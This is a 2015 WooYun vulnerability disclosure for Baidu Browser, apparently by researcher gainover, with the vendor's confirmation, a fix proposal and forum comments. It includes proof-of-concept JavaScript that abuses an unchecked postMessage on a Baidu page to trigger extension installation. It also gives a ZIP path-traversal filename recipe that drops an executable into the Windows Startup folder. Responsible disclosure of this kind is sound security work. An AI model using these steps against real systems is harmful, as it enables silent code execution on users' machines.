当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096413

漏洞标题:百度浏览器远程命令执行七

相关厂商:百度

漏洞作者: gainover

提交时间:2015-02-09 10:48

修复时间:2015-05-10 12:52

公开时间:2015-05-10 12:52

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-09: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向第三方安全合作伙伴开放
2015-04-05: 细节向核心白帽子及相关领域专家公开
2015-04-15: 细节向普通白帽子公开
2015-04-25: 细节向实习白帽子公开
2015-05-10: 细节向公众公开

简要描述:

嗯,还是有点意思。http://www.wooyun.org/bugs/wooyun-2015-095664 中所述问题的又一案例。

详细说明:

1. 本来是在 bbs.liulanqi.baidu.com下找到一个DOM XSS,但是发现百度这次把bbs.liulanqi.baidu.com从特权域中去掉了。T T。
2. 转战其它域,发现这么一个URL:http://chajian.baidu.com/app-res.html
在这个页面中,存在一些缺陷,允许来自外部的postMessage,这个页面够不成XSS,但是这个postMessage可以调用到一些特权的API,如:

window.external.StartRequest(1264, "extension_install", ....., "")


3. 上面的缺陷不具体分析了,我们可以自己编写以下页面代码:

var f=document.createElement("iframe");f.src="http://chajian.baidu.com/app-res.html";
f.onload=function(){
f.contentWindow.postMessage('{"type":"install","data":{"id":"fpdnjdlbdmifoocedhkighhlbchbiikl","url":"http://dlsw.br.baidu.com/app/201410/1f457685544a52b101cc1f173adae6f8.crx","ext_url":"http://dlsw.br.baidu.com/app_ext/201411/5833639e2b4c852bb7cf18570b0a578f.zip"}}','*');
};
document.body.appendChild(f);


其中,url是插件地址,ext_url是插件的LOGO压缩包(ZIP格式)
(测试地址:http://xsst.sinaapp.com/poc/bd7.htm)
4. 看样子我们可以实现安装一个插件,但是插件具有以下的交互提示:

1.png


5. 假设用户不会点击【安装】按钮,那么对于用户来说并没有任何影响。
-----------------------------------------------------------------------
!!!那么,这个点是不是就没用了呢?
-----------------------------------------------------------------------
6. 我们可以注意到ext_url对应了一个http://dlsw.br.baidu.com/app_ext/201411/5833639e2b4c852bb7cf18570b0a578f.zip这么一个压缩包,下载压缩包后,发现里面对应着插件的LOGO图片。当我们执行上面的代码(http://xsst.sinaapp.com/poc/bd7.htm)时,会发现本地会多出一个目录C:\Users\gainover\AppData\Roaming\Baidu\baidubrowser\user_data\default\chrome_profile\Imgs\fpdnjdlbdmifoocedhkighhlbchbiikl (WIN7下的路径),该目录下会多出2个图片,这2个图片,正是 http://dlsw.br.baidu.com/app_ext/201411/5833639e2b4c852bb7cf18570b0a578f.zip 里释放出来的。

2.png


7. 这说明,百度浏览器在执行externsion_install时,(即使用户不点击安装按钮),浏览器也会下载LOGO图片压缩包并解压到本地目录中。
因为这里存在一个解压缩操作,如果解压缩的函数存在问题,就会出现( WooYun: QQ浏览器远程任意命令执行漏洞(附有分析和利用) )中相类似的问题。
8. 于是测试如下,下载http://dlsw.br.baidu.com/app_ext/201411/5833639e2b4c852bb7cf18570b0a578f.zip文件,然后使用7zip修改,
拖入一个calc.exe到压缩包中,然后重命名为 ../../../../../../../../../../../calc.exe

3.png


9. 将修改后的压缩包放到服务器上
http://xsst.sinaapp.com/poc/bd2.zip
10. 然后将之前利用代码里的ext_url改为 http://xsst.sinaapp.com/poc/bd2.zip
见:http://xsst.sinaapp.com/poc/bd7_2.htm
运行后,弹出安装框,不用做任何操作,可以看到C盘根目录下写入了calc.exe
(Win7 需关闭UAC,或浏览器以管理员身份运行)

5.jpg


11. 利用这种方式,我们可以把exe写入到启动目录。
同上,拖入calc.exe到压缩包,然后重命名为:
../../../../../../../../../../../../../../../../../../Documents and Settings/All Users/「开始」菜单/程序/启动/calc.exe
XP下,百度浏览器访问http://xsst.sinaapp.com/poc/bd7_3.htm
写入效果:

4.png


漏洞证明:

见详细说明

修复方案:

1. 修复http://chajian.baidu.com/app-res.html中的缺陷,判断消息的origin
2. 修复安装插件流程中,对插件LOGO图压缩包解压缩的实现缺陷。

版权声明:转载请注明来源 gainover@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-09 12:51

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-09 10:50 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    二哥?

  2. 2015-02-09 10:51 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    快跟不上你的节奏了,支持!

  3. 2015-02-09 11:07 | Lyleaks ( 普通白帽子 | Rank:137 漏洞数:9 | 这个人很聪明,什么也没有留下)

    关注

  4. 2015-02-09 13:27 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    啪啪啪

  5. 2015-02-09 14:07 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    怎么没有六?

  6. 2015-02-09 15:30 | 盛大网络(乌云厂商)

    $$$

  7. 2015-02-09 16:03 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    是二哥么

  8. 2015-02-09 17:14 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    应该是吧

  9. 2015-02-09 18:04 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    二哥,你在不现身,打屁屁啦

  10. 2015-02-09 18:44 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

    果然是二哥

  11. 2015-02-09 19:01 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
  12. 2015-02-09 19:45 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @gainover 二哥 六呢???

  13. 2015-02-09 21:06 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @盛大网络 厂商又调皮了

  14. 2015-02-09 22:10 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    百度浏览器快被二哥玩烂了。。

  15. 2015-02-09 23:23 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    强烈要去百度加$$,虽然二哥不缺钱。。。

  16. 2015-02-12 14:54 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    我的梦想就是二哥打通我的任督二脉。秒变王者

  17. 2015-02-15 09:20 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    二哥 已 超越 猪猪侠 。

  18. 2015-02-28 12:12 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我勒个去,太尼玛牛逼了!!!!!!!!

  19. 2015-05-10 13:43 | Nullun ( 路人 | Rank:10 漏洞数:5 | ‮‮nullun‮)

    ../../../../../../../../../../../calc.exe是7zip的特技吗?

  20. 2015-05-20 14:41 | th000 ( 路人 | Rank:8 漏洞数:3 | 安全初段~)

    漂亮。